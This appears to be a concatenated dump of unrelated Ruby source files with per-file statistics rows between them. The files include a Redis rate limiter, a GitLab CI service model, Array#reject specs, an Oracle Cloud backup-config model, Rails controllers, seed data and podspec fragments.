# This message is used to select the transaction in which a
# {Google::Spanner::V1::Spanner::Read Read} or
# {Google::Spanner::V1::Spanner::ExecuteSql ExecuteSql} call runs.
#
# See {Google::Spanner::V1::TransactionOptions TransactionOptions} for more information about transactions.
# @!attribute [rw] single_use
# @return [Google::Spanner::V1::TransactionOptions]
# Execute the read or SQL query in a temporary transaction.
# This is the most efficient way to execute a transaction that
# consists of a single SQL query.
# @!attribute [rw] id
# @return [String]
# Execute the read or SQL query in a previously-started transaction.
# @!attribute [rw] begin
# @return [Google::Spanner::V1::TransactionOptions]
# Begin a new transaction and execute this read or SQL query in
# it. The transaction ID of the new transaction is returned in
# {Google::Spanner::V1::ResultSetMetadata#transaction ResultSetMetadata#transaction}, which is a {Google::Spanner::V1::Transaction Transaction}.
class TransactionSelector; end
end
end
end | 52.261574 | 154 | 0.673296 |
1c454aef7e5112fe225d8842a77da77d0b33ec81 | 4,271 | require 'redis'
require 'redis-namespace'
class Ratelimit
  # Create a RateLimit object.
  #
  # @param [String] key A name to uniquely identify this rate limit. For example, 'emails'
  # @param [Hash] options Options hash
  # @option options [Integer] :bucket_span (600) Time span to track in seconds
  # @option options [Integer] :bucket_interval (5) How many seconds each bucket represents
  # @option options [Integer] :bucket_expiry (@bucket_span) How long we keep data in each bucket before it is auto expired. Cannot be larger than the bucket_span.
  # @option options [Redis] :redis (nil) Redis client if you need to customize connection options
  #
  # @return [RateLimit] RateLimit instance
  #
  def initialize(key, options = {})
    @key = key
    unless options.is_a?(Hash)
      raise ArgumentError.new("Redis object is now passed in via the options hash - options[:redis]")
    end
    @bucket_span = options[:bucket_span] || 600
    @bucket_interval = options[:bucket_interval] || 5
    @bucket_expiry = options[:bucket_expiry] || @bucket_span
    if @bucket_expiry > @bucket_span
      raise ArgumentError.new("Bucket expiry cannot be larger than the bucket span")
    end
    @redis = options[:redis]
    # A callable (e.g. a connection-pool checkout proc) may be passed instead of
    # a client; remember which flavor we got so #with_redis can dispatch.
    @redis_proc = @redis.respond_to?(:to_proc)
  end
  # Add to the counter for a given subject.
  #
  # @param [String] subject A unique key to identify the subject. For example, '[email protected]'
  # @param [Integer] count The number by which to increase the counter
  #
  # @return [Integer] The counter value
  def add(subject, count = 1)
    subject = "#{@key}:#{subject}:#{get_bucket}"
    with_redis do |redis|
      # MULTI returns one reply per queued command; .first is the INCRBY result.
      redis.multi do
        redis.incrby(subject, count)
        redis.expire(subject, @bucket_expiry)
      end.first
    end
  end
  # Returns the count for a given subject and interval
  #
  # @param [String] subject Subject for the count
  # @param [Integer] interval How far back (in seconds) to retrieve activity.
  def count(subject, interval)
    bucket = get_bucket
    # Never look at fewer seconds than one bucket covers.
    interval = [interval, @bucket_interval].max
    count = (interval / @bucket_interval).floor
    subject = "#{@key}:#{subject}"
    keys = (0..count - 1).map {|i| "#{subject}:#{bucket - i}" }
    with_redis do |redis|
      # Missing buckets come back as nil; to_i turns them into 0.
      return redis.mget(*keys).inject(0) {|a, i| a + i.to_i}
    end
  end
  # Check if the rate limit has been exceeded.
  #
  # @param [String] subject Subject to check
  # @param [Hash] options Options hash
  # @option options [Integer] :interval How far back to retrieve activity.
  # @option options [Integer] :threshold Maximum number of actions
  def exceeded?(subject, options = {})
    return count(subject, options[:interval]) >= options[:threshold]
  end
  # Check if the rate limit is within bounds
  #
  # @param [String] subject Subject to check
  # @param [Hash] options Options hash
  # @option options [Integer] :interval How far back to retrieve activity.
  # @option options [Integer] :threshold Maximum number of actions
  def within_bounds?(subject, options = {})
    return !exceeded?(subject, options)
  end
  # Execute a block once the rate limit is within bounds
  # *WARNING* This will block the current thread until the rate limit is within bounds.
  #
  # @param [String] subject Subject for this rate limit
  # @param [Hash] options Options hash
  # @option options [Integer] :interval How far back to retrieve activity.
  # @option options [Integer] :threshold Maximum number of actions
  # @yield The block to be run
  #
  # @example Send an email as long as we haven't sent 5 in the last 10 minutes
  #   ratelimit.exec_within_threshold(email, threshold: 5, interval: 600) do
  #     send_another_email
  #   end
  def exec_within_threshold(subject, options = {}, &block)
    options[:threshold] ||= 30
    options[:interval] ||= 30
    while exceeded?(subject, options)
      sleep @bucket_interval
    end
    yield(self)
  end
  private
  # Index of the time bucket that contains `time` (defaults to now).
  def get_bucket(time = Time.now.to_i)
    (time / @bucket_interval).floor
  end
  # Yields a namespaced Redis connection, checking one out of the pool when a
  # callable was supplied.
  def with_redis
    if @redis_proc
      @redis.call do |redis|
        yield Redis::Namespace.new(:ratelimit, redis: redis)
      end
    else
      # NOTE(review): when a client was supplied via options[:redis], @redis is
      # already non-nil, so the ||= below never runs and the client is yielded
      # WITHOUT the :ratelimit namespace wrapper — unlike the proc and default
      # paths. Confirm whether that asymmetry is intended.
      @redis ||= Redis::Namespace.new(:ratelimit, :redis => @redis || Redis.new)
      yield @redis
    end
  end
end
| 34.723577 | 162 | 0.681339 |
08641b3e10ae5a4da376eed0a0cd27ce6f1ed13d | 57 | module Corelb
# corelb version
VERSION = "0.1.0"
end
| 11.4 | 19 | 0.666667 |
ed1944f337323262abfc220e01b0d87aa36fb65d | 1,814 | # == Schema Information
#
# Table name: services
#
# id :integer not null, primary key
# type :string(255)
# title :string(255)
# token :string(255)
# project_id :integer not null
# created_at :datetime
# updated_at :datetime
# active :boolean default(FALSE), not null
# project_url :string(255)
# subdomain :string(255)
# room :string(255)
# recipients :text
# api_key :string(255)
#
class GitlabCiService < Service
  attr_accessible :project_url

  validates :project_url, presence: true, if: :activated?
  validates :token, presence: true, if: :activated?

  delegate :execute, to: :service_hook, prefix: nil

  after_save :compose_service_hook, if: :activated?

  # Point the project's service hook at the CI server's build endpoint so
  # pushes are forwarded to GitLab CI.
  def compose_service_hook
    hook = service_hook || build_service_hook
    hook.url = [project_url, "/build", "?token=#{token}"].join("")
    hook.save
  end

  # URL of the JSON status endpoint for the given commit SHA.
  def commit_status_path(sha)
    project_url + "/builds/#{sha}/status.json?token=#{token}"
  end

  # Fetch the CI status for a commit.
  #
  # Returns the status string reported by the CI server, or :error when the
  # server is unreachable or replies with anything other than 200 + a status.
  def commit_status(sha)
    # NOTE: verify: false skips SSL certificate verification; kept for
    # backward compatibility with self-hosted CI installs using self-signed
    # certificates.
    response = HTTParty.get(commit_status_path(sha), verify: false)
    if response.code == 200 && response["status"]
      response["status"]
    else
      :error
    end
  rescue Errno::ECONNREFUSED, Errno::ETIMEDOUT, SocketError, Timeout::Error
    # BUG FIX: a network failure used to raise out of the status check;
    # degrade to :error instead, matching the non-200 path.
    :error
  end

  # URL of the build page for the given commit SHA.
  def build_page(sha)
    project_url + "/builds/#{sha}"
  end

  def builds_path
    project_url + "?ref=" + project.default_branch
  end

  def status_img_path
    project_url + "/status.png?ref=" + project.default_branch
  end

  def title
    'GitLab CI'
  end

  def description
    'Continuous integration server from GitLab'
  end

  def to_param
    'gitlab_ci'
  end

  # Form fields rendered on the service configuration page.
  def fields
    [
      { type: 'text', name: 'token', placeholder: 'GitLab CI project specific token' },
      { type: 'text', name: 'project_url', placeholder: 'http://ci.gitlabhq.com/projects/3'}
    ]
  end
end
| 22.395062 | 92 | 0.647189 |
e9ab5cc7a99e87a646a8e1df98ef7d6e60389a78 | 749 | Pod::Spec.new do |s|
s.name = "YZClockView"
s.version = "0.1.1"
s.summary = "A simple, elegant UIView to express time."
s.homepage = "https://github.com/AustinChou/YZClockView"
s.license = { :type => "MIT", :file => "LICENSE" }
s.author = { "Austin Chou" => "[email protected]" }
s.social_media_url = "http://twitter.com/austinchou0126"
s.platform = :ios
s.ios.deployment_target = "6.0"
s.source = { :git => "https://github.com/AustinChou/YZClockView.git", :tag => s.version }
s.source_files = "Classes/*.{h,m}"
s.public_header_files = "Classes/*.h"
s.requires_arc = true
end
| 46.8125 | 106 | 0.53271 |
264c916100dae7aca384cd0de3212f894448ffdd | 3,999 | require File.expand_path('../../../spec_helper', __FILE__)
require File.expand_path('../fixtures/classes', __FILE__)
require File.expand_path('../shared/enumeratorize', __FILE__)
describe "Array#reject" do
it "returns a new array without elements for which block is true" do
ary = [1, 2, 3, 4, 5]
ary.reject { true }.should == []
ary.reject { false }.should == ary
ary.reject { nil }.should == ary
ary.reject { 5 }.should == []
ary.reject { |i| i < 3 }.should == [3, 4, 5]
ary.reject { |i| i % 2 == 0 }.should == [1, 3, 5]
end
it "returns self when called on an Array emptied with #shift" do
array = [1]
array.shift
array.reject { |x| true }.should == []
end
it "properly handles recursive arrays" do
empty = ArraySpecs.empty_recursive_array
empty.reject { false }.should == [empty]
empty.reject { true }.should == []
array = ArraySpecs.recursive_array
array.reject { false }.should == [1, 'two', 3.0, array, array, array, array, array]
array.reject { true }.should == []
end
ruby_version_is "" ... "1.9.3" do
not_compliant_on :ironruby do
it "returns subclass instance on Array subclasses" do
ArraySpecs::MyArray[1, 2, 3].reject { |x| x % 2 == 0 }.should be_kind_of(ArraySpecs::MyArray)
end
end
deviates_on :ironruby do
it "does not return subclass instance on Array subclasses" do
ArraySpecs::MyArray[1, 2, 3].reject { |x| x % 2 == 0 }.should be_kind_of(Array)
end
end
end
ruby_version_is "1.9.3" do
it "does not return subclass instance on Array subclasses" do
ArraySpecs::MyArray[1, 2, 3].reject { |x| x % 2 == 0 }.should be_kind_of(Array)
end
it "does not retain instance variables" do
array = []
array.instance_variable_set("@variable", "value")
array.reject { false }.instance_variable_get("@variable").should == nil
end
end
it_behaves_like :enumeratorize, :reject
end
describe "Array#reject!" do
it "removes elements for which block is true" do
a = [3, 4, 5, 6, 7, 8, 9, 10, 11]
a.reject! { |i| i % 2 == 0 }.should equal(a)
a.should == [3, 5, 7, 9, 11]
a.reject! { |i| i > 8 }
a.should == [3, 5, 7]
a.reject! { |i| i < 4 }
a.should == [5, 7]
a.reject! { |i| i == 5 }
a.should == [7]
a.reject! { true }
a.should == []
a.reject! { true }
a.should == []
end
it "properly handles recursive arrays" do
empty = ArraySpecs.empty_recursive_array
empty_dup = empty.dup
empty.reject! { false }.should == nil
empty.should == empty_dup
empty = ArraySpecs.empty_recursive_array
empty.reject! { true }.should == []
empty.should == []
array = ArraySpecs.recursive_array
array_dup = array.dup
array.reject! { false }.should == nil
array.should == array_dup
array = ArraySpecs.recursive_array
array.reject! { true }.should == []
array.should == []
end
it "returns nil when called on an Array emptied with #shift" do
array = [1]
array.shift
array.reject! { |x| true }.should == nil
end
it "returns nil if no changes are made" do
a = [1, 2, 3]
a.reject! { |i| i < 0 }.should == nil
a.reject! { true }
a.reject! { true }.should == nil
end
ruby_version_is "" ... "1.9" do
it "raises a TypeError on a frozen array" do
lambda { ArraySpecs.frozen_array.reject! {} }.should raise_error(TypeError)
end
it "raises a TypeError on an empty frozen array" do
lambda { ArraySpecs.empty_frozen_array.reject! {} }.should raise_error(TypeError)
end
end
ruby_version_is "1.9" do
it "raises a RuntimeError on a frozen array" do
lambda { ArraySpecs.frozen_array.reject! {} }.should raise_error(RuntimeError)
end
it "raises a RuntimeError on an empty frozen array" do
lambda { ArraySpecs.empty_frozen_array.reject! {} }.should raise_error(RuntimeError)
end
end
it_behaves_like :enumeratorize, :reject!
end
| 30.067669 | 101 | 0.623906 |
01d4a6f34cacf61ae5514c4db0cd6e879f856493 | 1,506 | # frozen_string_literal: true
#
# Copyright:: 2020, Chef Software, Inc.
# Author:: Tim Smith (<[email protected]>)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'spec_helper'
# Specs for the WindowsFeatureServermanagercmd cop, which flags windows_feature
# resources that set install_method to the removed :servermanagercmd option.
describe RuboCop::Cop::Chef::ChefDeprecations::WindowsFeatureServermanagercmd, :config do
  subject(:cop) { described_class.new(config) }
  it 'registers an offense when windows_feature sets install_method to :servermanagercmd' do
    expect_offense(<<~RUBY)
      windows_feature 'DHCP' do
        install_method :servermanagercmd
        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ The `windows_feature` resource no longer supports setting the `install_method` to `:servermanagercmd`. `:windows_feature_dism` or `:windows_feature_powershell` should be used instead.
      end
    RUBY
  end
  it "doesn't register an offense when windows_feature sets install_method to :windows_feature_dism" do
    expect_no_offenses(<<~RUBY)
      windows_feature 'DHCP' do
        install_method :windows_feature_dism
      end
    RUBY
  end
end
| 36.731707 | 224 | 0.734396 |
1a0e30b21f87e826f7804b9a10bbf929627e9e5d | 11,026 | # Copyright (c) 2016, 2020, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
require 'date'
require 'logger'
# rubocop:disable Lint/UnneededCopDisableDirective, Metrics/LineLength
module OCI
# Backup Options
# To use any of the API operations, you must be authorized in an IAM policy. If you're not authorized, talk to an administrator. If you're an administrator who needs to write policies to give users access, see [Getting Started with Policies](https://docs.cloud.oracle.com/Content/Identity/Concepts/policygetstarted.htm).
#
class Database::Models::DbBackupConfig
AUTO_BACKUP_WINDOW_ENUM = [
AUTO_BACKUP_WINDOW_SLOT_ONE = 'SLOT_ONE'.freeze,
AUTO_BACKUP_WINDOW_SLOT_TWO = 'SLOT_TWO'.freeze,
AUTO_BACKUP_WINDOW_SLOT_THREE = 'SLOT_THREE'.freeze,
AUTO_BACKUP_WINDOW_SLOT_FOUR = 'SLOT_FOUR'.freeze,
AUTO_BACKUP_WINDOW_SLOT_FIVE = 'SLOT_FIVE'.freeze,
AUTO_BACKUP_WINDOW_SLOT_SIX = 'SLOT_SIX'.freeze,
AUTO_BACKUP_WINDOW_SLOT_SEVEN = 'SLOT_SEVEN'.freeze,
AUTO_BACKUP_WINDOW_SLOT_EIGHT = 'SLOT_EIGHT'.freeze,
AUTO_BACKUP_WINDOW_SLOT_NINE = 'SLOT_NINE'.freeze,
AUTO_BACKUP_WINDOW_SLOT_TEN = 'SLOT_TEN'.freeze,
AUTO_BACKUP_WINDOW_SLOT_ELEVEN = 'SLOT_ELEVEN'.freeze,
AUTO_BACKUP_WINDOW_SLOT_TWELVE = 'SLOT_TWELVE'.freeze,
AUTO_BACKUP_WINDOW_UNKNOWN_ENUM_VALUE = 'UNKNOWN_ENUM_VALUE'.freeze
].freeze
# If set to true, configures automatic backups. If you previously used RMAN or dbcli to configure backups and then you switch to using the Console or the API for backups, a new backup configuration is created and associated with your database. This means that you can no longer rely on your previously configured unmanaged backups to work.
# @return [BOOLEAN]
attr_accessor :auto_backup_enabled
# Number of days between the current and the earliest point of recoverability covered by automatic backups.
# This value applies to automatic backups only. After a new automatic backup has been created, Oracle removes old automatic backups that are created before the window.
# When the value is updated, it is applied to all existing automatic backups.
#
# @return [Integer]
attr_accessor :recovery_window_in_days
# Time window selected for initiating automatic backup for the database system. There are twelve available two-hour time windows. If no option is selected, a start time between 12:00 AM to 7:00 AM in the region of the database is automatically chosen. For example, if the user selects SLOT_TWO from the enum list, the automatic backup job will start in between 2:00 AM (inclusive) to 4:00 AM (exclusive).
#
# Example: `SLOT_TWO`
#
# @return [String]
attr_reader :auto_backup_window
# Backup destination details.
# @return [Array<OCI::Database::Models::BackupDestinationDetails>]
attr_accessor :backup_destination_details
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
# rubocop:disable Style/SymbolLiteral
'auto_backup_enabled': :'autoBackupEnabled',
'recovery_window_in_days': :'recoveryWindowInDays',
'auto_backup_window': :'autoBackupWindow',
'backup_destination_details': :'backupDestinationDetails'
# rubocop:enable Style/SymbolLiteral
}
end
# Attribute type mapping.
def self.swagger_types
{
# rubocop:disable Style/SymbolLiteral
'auto_backup_enabled': :'BOOLEAN',
'recovery_window_in_days': :'Integer',
'auto_backup_window': :'String',
'backup_destination_details': :'Array<OCI::Database::Models::BackupDestinationDetails>'
# rubocop:enable Style/SymbolLiteral
}
end
# rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
# rubocop:disable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
# @option attributes [BOOLEAN] :auto_backup_enabled The value to assign to the {#auto_backup_enabled} property
# @option attributes [Integer] :recovery_window_in_days The value to assign to the {#recovery_window_in_days} property
# @option attributes [String] :auto_backup_window The value to assign to the {#auto_backup_window} property
# @option attributes [Array<OCI::Database::Models::BackupDestinationDetails>] :backup_destination_details The value to assign to the {#backup_destination_details} property
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
self.auto_backup_enabled = attributes[:'autoBackupEnabled'] unless attributes[:'autoBackupEnabled'].nil?
raise 'You cannot provide both :autoBackupEnabled and :auto_backup_enabled' if attributes.key?(:'autoBackupEnabled') && attributes.key?(:'auto_backup_enabled')
self.auto_backup_enabled = attributes[:'auto_backup_enabled'] unless attributes[:'auto_backup_enabled'].nil?
self.recovery_window_in_days = attributes[:'recoveryWindowInDays'] if attributes[:'recoveryWindowInDays']
raise 'You cannot provide both :recoveryWindowInDays and :recovery_window_in_days' if attributes.key?(:'recoveryWindowInDays') && attributes.key?(:'recovery_window_in_days')
self.recovery_window_in_days = attributes[:'recovery_window_in_days'] if attributes[:'recovery_window_in_days']
self.auto_backup_window = attributes[:'autoBackupWindow'] if attributes[:'autoBackupWindow']
raise 'You cannot provide both :autoBackupWindow and :auto_backup_window' if attributes.key?(:'autoBackupWindow') && attributes.key?(:'auto_backup_window')
self.auto_backup_window = attributes[:'auto_backup_window'] if attributes[:'auto_backup_window']
self.backup_destination_details = attributes[:'backupDestinationDetails'] if attributes[:'backupDestinationDetails']
raise 'You cannot provide both :backupDestinationDetails and :backup_destination_details' if attributes.key?(:'backupDestinationDetails') && attributes.key?(:'backup_destination_details')
self.backup_destination_details = attributes[:'backup_destination_details'] if attributes[:'backup_destination_details']
end
# rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
# rubocop:enable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral
# Custom attribute writer method checking allowed values (enum).
# @param [Object] auto_backup_window Object to be assigned
def auto_backup_window=(auto_backup_window)
# rubocop:disable Style/ConditionalAssignment
if auto_backup_window && !AUTO_BACKUP_WINDOW_ENUM.include?(auto_backup_window)
OCI.logger.debug("Unknown value for 'auto_backup_window' [" + auto_backup_window + "]. Mapping to 'AUTO_BACKUP_WINDOW_UNKNOWN_ENUM_VALUE'") if OCI.logger
@auto_backup_window = AUTO_BACKUP_WINDOW_UNKNOWN_ENUM_VALUE
else
@auto_backup_window = auto_backup_window
end
# rubocop:enable Style/ConditionalAssignment
end
# rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines
# Checks equality by comparing each attribute.
# @param [Object] other the other object to be compared
def ==(other)
return true if equal?(other)
self.class == other.class &&
auto_backup_enabled == other.auto_backup_enabled &&
recovery_window_in_days == other.recovery_window_in_days &&
auto_backup_window == other.auto_backup_window &&
backup_destination_details == other.backup_destination_details
end
# rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines
# @see the `==` method
# @param [Object] other the other object to be compared
def eql?(other)
self == other
end
# rubocop:disable Metrics/AbcSize, Layout/EmptyLines
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[auto_backup_enabled, recovery_window_in_days, auto_backup_window, backup_destination_details].hash
end
# rubocop:enable Metrics/AbcSize, Layout/EmptyLines
# rubocop:disable Metrics/AbcSize, Layout/EmptyLines
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /^Array<(.*)>/i
# check to ensure the input is an array given that the the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
public_method("#{key}=").call(
attributes[self.class.attribute_map[key]]
.map { |v| OCI::Internal::Util.convert_to_type(Regexp.last_match(1), v) }
)
end
elsif !attributes[self.class.attribute_map[key]].nil?
public_method("#{key}=").call(
OCI::Internal::Util.convert_to_type(type, attributes[self.class.attribute_map[key]])
)
end
# or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# rubocop:enable Metrics/AbcSize, Layout/EmptyLines
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = public_method(attr).call
next if value.nil? && !instance_variable_defined?("@#{attr}")
hash[param] = _to_hash(value)
end
hash
end
private
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
# rubocop:enable Lint/UnneededCopDisableDirective, Metrics/LineLength
| 46.919149 | 408 | 0.724197 |
2818ec12876a91370d4cd05051f727d19147adc4 | 169 | require 'lib/bitcoin/price'
module Bitcoin
def self.get_current_price
Price.get_current
end
def self.get_past_month_price
Price.get_past_month
end
end
| 14.083333 | 31 | 0.769231 |
1d657e7b1d55f46906d50f2568d9d21f52026490 | 187 | class RemoveCategoryFromStories < ActiveRecord::Migration[6.0]
def change
remove_column :stories, :cateogry_code, :string
add_column :stories, :category_code, :string
end
end
| 26.714286 | 62 | 0.764706 |
08973ec52b5d6b72f7300be61c155ffa68a156a5 | 56 | class Domain < ActiveRecord::Base
has_many :pages
end
| 14 | 33 | 0.767857 |
f7ba8faecc5d34e6393890feb8c04e84240ae629 | 2,523 | class CommentsController < ProtectedController
before_action :skip_policy_scope
before_action :set_comment, only: [:show, :edit, :update, :destroy]
before_action :set_commentable
# GET /commentable/:commentable_id/comments
# GET /commentable/:commentable_id/comments.json
def index
if @commentable.present?
@comments = @commentable.comments.order(created_at: :desc)
else
@comments = Comment.all.order(created_at: :desc)
end
end
# GET /comments/1
def show
authorize @comment
end
# GET /commentable/:commentable_id/new
def new
@comment = @commentable.comments.new
authorize @comment
end
def edit
authorize @comment
end
# POST /commentable/:commentable_id/comments
# POST /commentable/:commentable_id/comments.json
def create
@comment = @commentable.comments.new(comment_params)
@comment.user = current_user
authorize @comment
respond_to do |format|
if @comment.save
format.html { redirect_to @comment, notice: 'Comment was successfully created.' }
format.json { render :show, status: :created, location: polymorphic_path([@commentable, @comment]) }
else
format.html { render :new }
format.json { render json: @comment.errors, status: :unprocessable_entity }
end
end
end
# PATCH/PUT /comments/1
# PATCH/PUT /comments/1.json
def update
authorize @comment
respond_to do |format|
if @comment.update(comment_params)
format.html { redirect_to @comment, notice: 'Comment was successfully updated.' }
format.json { render :show, status: :ok, location: @comment }
else
format.html { render :edit }
format.json { render json: @comment.errors, status: :unprocessable_entity }
end
end
end
# DELETE /comments/1
# DELETE /comments/1.json
def destroy
authorize @comment
@comment.destroy
respond_to do |format|
format.html { redirect_to comments_path, notice: 'Comment was successfully destroyed.' }
format.json { head :no_content }
end
end
private
def set_comment
@comment = Comment.includes(:user, :commentable).find(params[:id])
end
# Only allow the white listed params through.
def comment_params
params.fetch(:comment, {}).permit(:body)
end
def set_commentable
resource, id = request.path.split('/')[1,2]
@commentable = resource.singularize.classify.constantize.find(id) if id.present?
end
end | 27.129032 | 108 | 0.673801 |
089242c53a3a277f06ab2ded5156ca668f3a1f53 | 1,094 | require 'json'
# Returns the version number for a package.json file
pkg_version = lambda do |dir_from_root = '', version = 'version'|
path = File.join(__dir__, dir_from_root, 'package.json')
JSON.parse(File.read(path))[version]
end
# Let the main package.json decide the version number for the pod
package_version = pkg_version.call
Pod::Spec.new do |s|
s.name = "ReactNativeKakaoMaps"
s.version = package_version
s.summary = "A react native module kakao maps"
s.description = <<-DESC
A react native module kakao maps
DESC
s.homepage = "https://github.com/jiggag/react-native-kakao-maps"
s.license = "MIT"
s.author = { "Atul R" => "[email protected]" }
s.platform = :ios, "9.0"
s.source = { :git => "https://github.com/jiggag/react-native-kakao-maps.git", :tag => s.version.to_s }
s.source_files = "ios/*.{h,m}"
s.vendored_frameworks = 'ios/DaumMap.embeddedframework/DaumMap.framework'
s.resources = ['ios/DaumMap.embeddedframework/Resources/*.png']
s.dependency "React"
end
| 35.290323 | 110 | 0.655393 |
1afc79542cc47005b82ef5a596a45bf7d7f415e5 | 889 | # frozen_string_literal: true
# Copyright 2016-2021 Copado NCS LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require "kitchen/terraform/command/version"
# Verifies that Command::Version renders as the bare `version` subcommand.
::RSpec.describe ::Kitchen::Terraform::Command::Version do
  subject do
    described_class.new
  end
  describe "#to_s" do
    specify "should return the command" do
      expect(subject.to_s).to eq "version"
    end
  end
end
| 29.633333 | 74 | 0.746907 |
ab36f0823fdec66ed7b1ffb9400ed55d5e063255 | 3,328 | class UserProfilesController < ApplicationController
def show
id = 0
if user_signed_in?
id = current_user.id
end
if params["id"] != nil
id = params["id"].to_i
end
@user_profile = UserProfile.where({:user_id => id}).last
if @user_profile == nil
flash[:error] = "no such user exist"
redirect_to '/'
end
@intersts = UserInterst.Find_by_User(id)
end
def edit
if user_signed_in?
@user_profile = UserProfile.where({:user_id => current_user.id}).last
else
flash[:error] = "login to edit"
redirect_to dont_do_mischievous_path
end
end
def edit_intersts
if user_signed_in?
@intersts = UserInterst.Find_by_User(current_user.id)
@tags = Tag.all
else
flash[:error] = "login to edit"
redirect_to dont_do_mischievous_path
end
end
def update_intrests
if user_signed_in?
tagIds = []
tag_ids = params["tag_ids"]
if tag_ids != nil
tag_ids.each do |tag_id|
if Integer(tag_id, exception: false)
tagid = tag_id.to_i
if tagid > 0
puts tagid
if Tag.find_by_id(tagid) != nil
tagIds << tagid
else
puts "error :: unknown tagid entered"
end
end
end
end
end
UserInterst::Delete_by_User(current_user.id)
tagIds.each do |tag_id|
UserInterst.Create(current_user.id,tag_id)
end
redirect_to current_user_profile_path
else
flash[:error] = "login to edit"
redirect_to dont_do_mischievous_path
end
end
def update
if user_signed_in?
@user_profile = UserProfile.where({:user_id => current_user.id}).last
puts params[:new_params]
@user_profile.full_name = params[:new_params]["full_name"]
@user_profile.dob = DateTime.parse(params[:new_params][:dob])
@user_profile.college_id = params[:new_params][:college_id]
@user_profile.country = params[:new_params][:country]
if params[:new_params][:profile_picture] != nil
@user_profile.profile_picture.attach(params[:new_params][:profile_picture])
end
#intializing points
if @user_profile.points == nil
@user_profile.points = 0
end
#save
if @user_profile.save
flash[:success] = 'saved successfully'
else
flash[:error] = 'not saved please try again.'
end
else
flash[:error] = "login to update userprofile"
end
redirect_to '/user_profiles/'
end
end
| 32.627451 | 99 | 0.477764 |
28e1004bf39406ddd977efeb9a3c8034465b5f12 | 206 | # TODO: need to figure out something better for measures.yml
# APP_CONFIG.merge! YAML.load_file(Rails.root.join('config', 'measures.yml'))
Dir[Rails.root + 'lib/**/*.rb'].sort.each { |file| require file }
| 41.2 | 77 | 0.708738 |
03a1b0eff9a22aa0bd14ccea2abb1d45216ee584 | 559 | require 'action_view'
module Roll
  module Amp
    module Style
      # Wraps arbitrary content in a <noscript> element.
      class NoScriptTag
        include ActionView::Helpers::TagHelper
        # Initializes a new noscript tag.
        # @param body [String] the content rendered inside the tag.
        def initialize(body)
          @content = body
        end
        # Renders this tag.
        # @return [String] HTML-safe string containing the tag's markup.
        def to_html
          content_tag('noscript', @content)
        end
      end
    end
  end
end
| 22.36 | 75 | 0.599284 |
aba5e0a258687e0b840c6bb291d8f2ebe4f571fc | 601 | # This file should contain all the record creation needed to seed the database with its default values.
# The data can then be loaded with the rails db:seed command (or created alongside the database with db:setup).
#
# Examples:
#
# movies = Movie.create([{ name: 'Star Wars' }, { name: 'Lord of the Rings' }])
# Character.create(name: 'Luke', movie: movies.first)
# Seed 15 posts, each with three comments, using Faker hacker jargon.
15.times do
  post = Post.create({title: Faker::Hacker.abbreviation, content: Faker::Hacker.say_something_smart})
  # Comments are built in memory and persisted by the save below.
  3.times do
    post.comments.build({content: Faker::Hacker.say_something_smart})
  end
  post.save
end
2641a203a29555d5e3f0df8c8d1d535249ae2fd9 | 1,452 | #!/usr/bin/ruby
require 'dotenv/load'
Pod::Spec.new do |spec|
spec.name = "Contentful"
spec.version = ENV['CONTENTFUL_SDK_VERSION']
spec.summary = "Swift SDK for Contentful's Content Delivery API."
spec.homepage = "https://github.com/contentful/contentful.swift/"
spec.social_media_url = 'https://twitter.com/contentful'
spec.license = {
:type => 'MIT',
:file => 'LICENSE'
}
spec.authors = { "JP Wright" => "[email protected]", "Boris Bügling" => "[email protected]" }
spec.source = { :git => "https://github.com/contentful/contentful.swift.git",
:tag => spec.version.to_s }
spec.requires_arc = true
spec.source_files = 'Sources/Contentful/*.swift'
spec.frameworks = 'CoreLocation'
## Platform specific source code.
